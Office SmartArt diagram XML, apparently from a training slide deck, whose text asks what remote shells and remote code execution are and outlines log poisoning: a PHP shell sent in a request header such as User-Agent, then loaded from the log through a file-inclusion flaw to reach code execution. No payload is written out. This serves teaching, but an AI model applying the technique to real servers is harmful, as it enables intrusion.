    <dgm:cxn modelId="{E60ECDFE-9D0D-45D7-8867-78A8E3A887DE}" type="presParOf" srcId="{0B153A73-B9FF-433C-A215-5AE77120A988}" destId="{02FAF387-A0E3-4E20-B06F-EC1F353F71B9}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{83F6B58D-127F-4B73-94C5-D08D55C06369}" type="presParOf" srcId="{0B153A73-B9FF-433C-A215-5AE77120A988}" destId="{7767A5FB-64A8-4315-B4CA-C9E8BA340424}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{0C85CA51-6266-4B36-B658-48AB8A0BCBA4}" type="presParOf" srcId="{DD311AE4-A3DB-47A0-8C2F-91A4BF3521D4}" destId="{B23335ED-F16F-4162-9B72-3066DF24004F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{6D935F05-58E6-4B39-8ACB-C039F8576AA1}" type="presParOf" srcId="{DD311AE4-A3DB-47A0-8C2F-91A4BF3521D4}" destId="{16F15EE6-C9A6-47C0-9A4A-5EB2EB03BA40}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{F9D18CAF-9C37-44F7-8927-4FA6FA41A680}" type="presParOf" srcId="{16F15EE6-C9A6-47C0-9A4A-5EB2EB03BA40}" destId="{A53C9AAB-58E6-4593-AFA9-E2DE8B2983AA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{ACCB3180-4BCA-42D7-9B6D-14C46D748BF0}" type="presParOf" srcId="{16F15EE6-C9A6-47C0-9A4A-5EB2EB03BA40}" destId="{9DC21E0E-7BD9-4A22-BCE0-C878258E5DAE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{A55E37BE-F703-4E3C-9A21-2F3115B3D8D2}" type="presParOf" srcId="{16F15EE6-C9A6-47C0-9A4A-5EB2EB03BA40}" destId="{648DF29D-DF6B-4DAA-9E6A-32A9F421C1FD}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{EE562C14-44BB-48DE-8311-AC1993247D39}" type="presParOf" srcId="{16F15EE6-C9A6-47C0-9A4A-5EB2EB03BA40}" destId="{9367BC75-8AE8-4899-8891-B93C73707DF2}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{E681DA68-8BE9-489A-87F5-B389BDE23EAB}" type="presParOf" srcId="{DD311AE4-A3DB-47A0-8C2F-91A4BF3521D4}" destId="{5853C95E-9E6C-442D-90FB-71C39CF73D70}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{9D282DE9-CC2C-457F-8B59-BEECDF3651D0}" type="presParOf" srcId="{DD311AE4-A3DB-47A0-8C2F-91A4BF3521D4}" destId="{FB186F4C-6789-41B5-8D69-7D0D078EE2EC}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{A7EDBE93-A49C-4F31-8C28-B89953F7E8B2}" type="presParOf" srcId="{FB186F4C-6789-41B5-8D69-7D0D078EE2EC}" destId="{E1C3C528-0F6E-4C81-A64C-84B6EE70C701}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{BAE6F277-2003-4FBA-8B19-D261013B9778}" type="presParOf" srcId="{FB186F4C-6789-41B5-8D69-7D0D078EE2EC}" destId="{E3FDCEE4-A1B2-41B7-937A-55B0692BDE61}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{699F7AE9-41A3-4E06-8A48-8B246E246122}" type="presParOf" srcId="{FB186F4C-6789-41B5-8D69-7D0D078EE2EC}" destId="{455754E4-8FEB-4BB9-9AF9-FFF6342FFF62}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{838E80EC-3350-4D5E-A4A3-50FA21E2BE20}" type="presParOf" srcId="{FB186F4C-6789-41B5-8D69-7D0D078EE2EC}" destId="{9F954E8B-30F7-4981-8D84-4B62D66B4F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FD61FE-2C46-4B5A-A945-B1D096CACEB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989FED2-149A-44EF-B8E3-45AD3119FD4E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>What is a remote shell?</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D0A13817-2A60-4A64-AC12-41C90565F85B}" type="parTrans" cxnId="{82B4C1D8-95A5-42A4-98BF-5FB5663B7E6A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BD1145D1-91EF-4392-8B63-F8E9C8BFD191}" type="sibTrans" cxnId="{82B4C1D8-95A5-42A4-98BF-5FB5663B7E6A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1FAD554D-196A-4E17-826F-EF505A2B2454}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>What is remote code execution?</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2885C660-E317-4CC5-867D-9123F1D30438}" type="parTrans" cxnId="{2123EBB3-151E-4B4E-93CF-B9294DE98E1E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9240693C-13B3-4BE9-A707-5C544F4D0060}" type="sibTrans" cxnId="{2123EBB3-151E-4B4E-93CF-B9294DE98E1E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EEAEB5C0-E6FC-4966-AF0C-1453CDE68B25}" type="pres">
      <dgm:prSet presAssocID="{B9FD61FE-2C46-4B5A-A945-B1D096CACEB7}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{042545E5-03B8-4CBE-8867-EDF6954B4056}" type="pres">
      <dgm:prSet presAssocID="{8989FED2-149A-44EF-B8E3-45AD3119FD4E}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BD59EF2F-5671-4332-AEB6-7A71545C4F0E}" type="pres">
      <dgm:prSet presAssocID="{8989FED2-149A-44EF-B8E3-45AD3119FD4E}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{07258925-E30D-4866-A326-67A4A832B7AD}" type="pres">
      <dgm:prSet presAssocID="{8989FED2-149A-44EF-B8E3-45AD3119FD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C7A32CF-D65E-4009-81D1-239393836F08}" type="pres">
      <dgm:prSet presAssocID="{8989FED2-149A-44EF-B8E3-45AD3119FD4E}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CED1C96A-F89F-491E-AD3B-575CEBC601DC}" type="pres">
      <dgm:prSet presAssocID="{8989FED2-149A-44EF-B8E3-45AD3119FD4E}" presName="parTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4613B8DE-B72F-434C-9204-A56113362178}" type="pres">
      <dgm:prSet presAssocID="{BD1145D1-91EF-4392-8B63-F8E9C8BFD191}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D519A571-66A8-49B2-8DDA-088507C1F87C}" type="pres">
      <dgm:prSet presAssocID="{1FAD554D-196A-4E17-826F-EF505A2B2454}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D47ABB40-68B0-4B9D-BA71-BD3163C5EFA5}" type="pres">
      <dgm:prSet presAssocID="{1FAD554D-196A-4E17-826F-EF505A2B2454}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6050ED75-4704-49F4-8895-AF5AC75636B7}" type="pres">
      <dgm:prSet presAssocID="{1FAD554D-196A-4E17-826F-EF505A2B24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68889C5-9520-40D0-9181-34357BAF08DB}" type="pres">
      <dgm:prSet presAssocID="{1FAD554D-196A-4E17-826F-EF505A2B2454}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8886F4BB-87DE-48B9-9339-52A9E03CE542}" type="pres">
      <dgm:prSet presAssocID="{1FAD554D-196A-4E17-826F-EF505A2B245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B34385-52F2-490F-B35E-B62EAE723D83}" type="presOf" srcId="{1FAD554D-196A-4E17-826F-EF505A2B2454}" destId="{8886F4BB-87DE-48B9-9339-52A9E03CE542}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{7FBFF78A-C8DA-4E93-B41C-170F262B017C}" type="presOf" srcId="{B9FD61FE-2C46-4B5A-A945-B1D096CACEB7}" destId="{EEAEB5C0-E6FC-4966-AF0C-1453CDE68B25}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{2123EBB3-151E-4B4E-93CF-B9294DE98E1E}" srcId="{B9FD61FE-2C46-4B5A-A945-B1D096CACEB7}" destId="{1FAD554D-196A-4E17-826F-EF505A2B2454}" srcOrd="1" destOrd="0" parTransId="{2885C660-E317-4CC5-867D-9123F1D30438}" sibTransId="{9240693C-13B3-4BE9-A707-5C544F4D0060}"/>
    <dgm:cxn modelId="{82B4C1D8-95A5-42A4-98BF-5FB5663B7E6A}" srcId="{B9FD61FE-2C46-4B5A-A945-B1D096CACEB7}" destId="{8989FED2-149A-44EF-B8E3-45AD3119FD4E}" srcOrd="0" destOrd="0" parTransId="{D0A13817-2A60-4A64-AC12-41C90565F85B}" sibTransId="{BD1145D1-91EF-4392-8B63-F8E9C8BFD191}"/>
    <dgm:cxn modelId="{F7ED35F9-AEB0-4E84-96F3-130F0301AB84}" type="presOf" srcId="{8989FED2-149A-44EF-B8E3-45AD3119FD4E}" destId="{CED1C96A-F89F-491E-AD3B-575CEBC601DC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{75E0E528-C884-4449-BC62-1F3DC04AB9DB}" type="presParOf" srcId="{EEAEB5C0-E6FC-4966-AF0C-1453CDE68B25}" destId="{042545E5-03B8-4CBE-8867-EDF6954B4056}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{15FA2DF8-0133-48F1-A86E-E4BDC6B84016}" type="presParOf" srcId="{042545E5-03B8-4CBE-8867-EDF6954B4056}" destId="{BD59EF2F-5671-4332-AEB6-7A71545C4F0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{696E5D4E-8472-49E4-927A-6970D1329333}" type="presParOf" srcId="{042545E5-03B8-4CBE-8867-EDF6954B4056}" destId="{07258925-E30D-4866-A326-67A4A832B7AD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{9D70746F-375E-4B04-BED8-BF650162F288}" type="presParOf" srcId="{042545E5-03B8-4CBE-8867-EDF6954B4056}" destId="{CC7A32CF-D65E-4009-81D1-239393836F08}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{FA50818C-5324-4260-8688-471FD90F5B55}" type="presParOf" srcId="{042545E5-03B8-4CBE-8867-EDF6954B4056}" destId="{CED1C96A-F89F-491E-AD3B-575CEBC601DC}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{12127861-20FB-4A6F-A5BB-3CA4BE78742C}" type="presParOf" srcId="{EEAEB5C0-E6FC-4966-AF0C-1453CDE68B25}" destId="{4613B8DE-B72F-434C-9204-A56113362178}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{4E541368-1B0E-4505-92A9-02955D783D06}" type="presParOf" srcId="{EEAEB5C0-E6FC-4966-AF0C-1453CDE68B25}" destId="{D519A571-66A8-49B2-8DDA-088507C1F87C}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{DABC2189-7698-4CA4-A47B-501EFF5DE117}" type="presParOf" srcId="{D519A571-66A8-49B2-8DDA-088507C1F87C}" destId="{D47ABB40-68B0-4B9D-BA71-BD3163C5EFA5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{AF9AF658-5F28-477D-81DA-5A84AF581F16}" type="presParOf" srcId="{D519A571-66A8-49B2-8DDA-088507C1F87C}" destId="{6050ED75-4704-49F4-8895-AF5AC75636B7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{EF96B2DC-C9F6-4ABF-A0FA-D13EC04B6085}" type="presParOf" srcId="{D519A571-66A8-49B2-8DDA-088507C1F87C}" destId="{568889C5-9520-40D0-9181-34357BAF08DB}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{DD90C45E-8F79-4A69-9038-75D6CA463098}" type="presParOf" srcId="{D519A571-66A8-49B2-8DDA-088507C1F87C}" destId="{8886F4BB-87DE-48B9-9339-52A9E03CE5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8F2297-58E8-4791-9D8E-A09C991C88A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E270B9-EA2A-4276-8BF7-FA420ED14B0A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Make a request to the server and include a PHP shell in the request.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9BA0CA90-90C5-483D-9EB4-920895E1FA36}" type="parTrans" cxnId="{83DC03BC-E792-4FAB-930E-85A5D663DFF5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D6CA14A8-3CE1-46FD-8ED7-0FDC755A0E67}" type="sibTrans" cxnId="{83DC03BC-E792-4FAB-930E-85A5D663DFF5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1C4A0294-10FE-4DA9-A9D8-1873B066D30C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Eg through the User-Agent string, any header will do!</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A2A4C523-97E4-4FFC-807F-E73551F2BC13}" type="parTrans" cxnId="{63509257-3FD1-4A5F-B462-15A5E3041D03}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EB0DD20F-BFFC-40C9-82FF-15AAE227850E}" type="sibTrans" cxnId="{63509257-3FD1-4A5F-B462-15A5E3041D03}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{43768E17-9050-44EF-8DC1-4BFD097B22D6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Browse to the log via the LFI vulnerability</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{10F4DCFF-00ED-4BE3-8511-4F3383B780B4}" type="parTrans" cxnId="{FACF3939-46D6-4723-B1E4-7DC26E53ECA5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6AB66072-2380-4EED-B489-315B9466A246}" type="sibTrans" cxnId="{FACF3939-46D6-4723-B1E4-7DC26E53ECA5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{24EEA9FD-845F-4E9D-9FDC-5A8828E5913B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Achieve code execution</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{90ADDD93-ED13-481A-A933-3F4EE135CEAF}" type="parTrans" cxnId="{296E43C4-ADAF-4585-A872-AAB457D5C2BC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CDAB23BE-6857-4E9E-8CA9-0C2FC65A9E3A}" type="sibTrans" cxnId="{296E43C4-ADAF-4585-A872-AAB457D5C2BC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C8013DC-8B33-4F4C-A1DB-56C2FFCBFC92}" type="pres">
      <dgm:prSet presAssocID="{0D8F2297-58E8-4791-9D8E-A09C991C88A8}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D7798D4F-8ED3-4AA8-B46D-A58AABE11607}" type="pres">
      <dgm:prSet presAssocID="{FBE270B9-EA2A-4276-8BF7-FA420ED14B0A}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{34A8CAB2-C5E7-44DD-9EE2-85BACE6F4C66}" type="pres">
      <dgm:prSet presAssocID="{FBE270B9-EA2A-4276-8BF7-FA420ED14B0A}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DE538B89-3EE0-4CBE-96C6-0CB2587FB7E9}" type="pres">
      <dgm:prSet presAssocID="{FBE270B9-EA2A-4276-8BF7-FA420ED14B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0118A55-3E3F-42DA-A7B5-1061B4607EDD}" type="pres">
      <dgm:prSet presAssocID="{FBE270B9-EA2A-4276-8BF7-FA420ED14B0A}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0ADD3A92-8CE6-4469-9681-FA8DB1ED0077}" type="pres">
      <dgm:prSet presAssocID="{FBE270B9-EA2A-4276-8BF7-FA420ED14B0A}" presName="parTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FC6E3100-D70B-4380-8C1B-2EDC6007C0A2}" type="pres">
      <dgm:prSet presAssocID="{D6CA14A8-3CE1-46FD-8ED7-0FDC755A0E67}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4DD9252A-881E-4AFC-8090-C1EA31DDF008}" type="pres">
      <dgm:prSet presAssocID="{1C4A0294-10FE-4DA9-A9D8-1873B066D30C}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{808CCB7E-DB94-4610-9C81-292825DFEF61}" type="pres">
      <dgm:prSet presAssocID="{1C4A0294-10FE-4DA9-A9D8-1873B066D30C}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{08933C2F-35A5-4E6D-93AC-D1CF95B91306}" type="pres">
      <dgm:prSet presAssocID="{1C4A0294-10FE-4DA9-A9D8-1873B066D3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3D403A6-10CE-4186-B0CF-651270FA7E07}" type="pres">
      <dgm:prSet presAssocID="{1C4A0294-10FE-4DA9-A9D8-1873B066D30C}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B3AE0DA2-F359-4939-9FEE-621D18F8DE7C}" type="pres">
      <dgm:prSet presAssocID="{1C4A0294-10FE-4DA9-A9D8-1873B066D30C}" presName="parTx" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{52412E48-858B-49D4-96FC-DF7697BD54FC}" type="pres">
      <dgm:prSet presAssocID="{EB0DD20F-BFFC-40C9-82FF-15AAE227850E}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{70F046CC-2F1E-4763-BAA5-B93E20CBCD10}" type="pres">
      <dgm:prSet presAssocID="{43768E17-9050-44EF-8DC1-4BFD097B22D6}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{956DB420-7BFE-41C4-ABDB-C013A1A9FEAD}" type="pres">
      <dgm:prSet presAssocID="{43768E17-9050-44EF-8DC1-4BFD097B22D6}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D5C34A1B-934E-4D43-915D-6CEA03B2B9BB}" type="pres">
      <dgm:prSet presAssocID="{43768E17-9050-44EF-8DC1-4BFD097B22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3DC26732-5C7F-40A3-A502-B23C7D886BA7}" type="pres">
      <dgm:prSet presAssocID="{43768E17-9050-44EF-8DC1-4BFD097B22D6}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{26CD59CF-01EA-47B9-94F9-FDF9CA3F62E5}" type="pres">
      <dgm:prSet presAssocID="{43768E17-9050-44EF-8DC1-4BFD097B22D6}" presName="parTx" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{74083E8B-8ADA-465D-8DFA-7F1DEC585822}" type="pres">
      <dgm:prSet presAssocID="{6AB66072-2380-4EED-B489-315B9466A246}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{86C9E128-F2BD-4473-877C-648B8653D88C}" type="pres">
      <dgm:prSet presAssocID="{24EEA9FD-845F-4E9D-9FDC-5A8828E5913B}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DAADC582-CEED-4CE7-8DCD-F7BC0BDE788F}" type="pres">
      <dgm:prSet presAssocID="{24EEA9FD-845F-4E9D-9FDC-5A8828E5913B}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CB5FCFE8-7D4F-4DCA-A599-C62FB0583F12}" type="pres">
      <dgm:prSet presAssocID="{24EEA9FD-845F-4E9D-9FDC-5A8828E591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46663CE-B46E-49EE-967B-CD90B83D9FA5}" type="pres">
      <dgm:prSet presAssocID="{24EEA9FD-845F-4E9D-9FDC-5A8828E5913B}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{40890F1C-BCA7-4BAA-AE61-E60625AD573D}" type="pres">
      <dgm:prSet presAssocID="{24EEA9FD-845F-4E9D-9FDC-5A8828E5913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ACF3939-46D6-4723-B1E4-7DC26E53ECA5}" srcId="{0D8F2297-58E8-4791-9D8E-A09C991C88A8}" destId="{43768E17-9050-44EF-8DC1-4BFD097B22D6}" srcOrd="2" destOrd="0" parTransId="{10F4DCFF-00ED-4BE3-8511-4F3383B780B4}" sibTransId="{6AB66072-2380-4EED-B489-315B9466A246}"/>
    <dgm:cxn modelId="{373F4D50-D273-4323-A687-12D59E38D295}" type="presOf" srcId="{43768E17-9050-44EF-8DC1-4BFD097B22D6}" destId="{26CD59CF-01EA-47B9-94F9-FDF9CA3F62E5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{5E670355-0353-4FB6-915C-4C3049A80B2A}" type="presOf" srcId="{FBE270B9-EA2A-4276-8BF7-FA420ED14B0A}" destId="{0ADD3A92-8CE6-4469-9681-FA8DB1ED0077}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{63509257-3FD1-4A5F-B462-15A5E3041D03}" srcId="{0D8F2297-58E8-4791-9D8E-A09C991C88A8}" destId="{1C4A0294-10FE-4DA9-A9D8-1873B066D30C}" srcOrd="1" destOrd="0" parTransId="{A2A4C523-97E4-4FFC-807F-E73551F2BC13}" sibTransId="{EB0DD20F-BFFC-40C9-82FF-15AAE227850E}"/>
    <dgm:cxn modelId="{79AC9258-F354-4FEF-9F8E-7498FC0F5D1E}" type="presOf" srcId="{0D8F2297-58E8-4791-9D8E-A09C991C88A8}" destId="{5C8013DC-8B33-4F4C-A1DB-56C2FFCBFC92}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{411637A1-CD75-4D25-8BEE-7498339BA327}" type="presOf" srcId="{1C4A0294-10FE-4DA9-A9D8-1873B066D30C}" destId="{B3AE0DA2-F359-4939-9FEE-621D18F8DE7C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{C41BE5AE-8A8B-4818-9B7F-6E766D2C7CE8}" type="presOf" srcId="{24EEA9FD-845F-4E9D-9FDC-5A8828E5913B}" destId="{40890F1C-BCA7-4BAA-AE61-E60625AD573D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
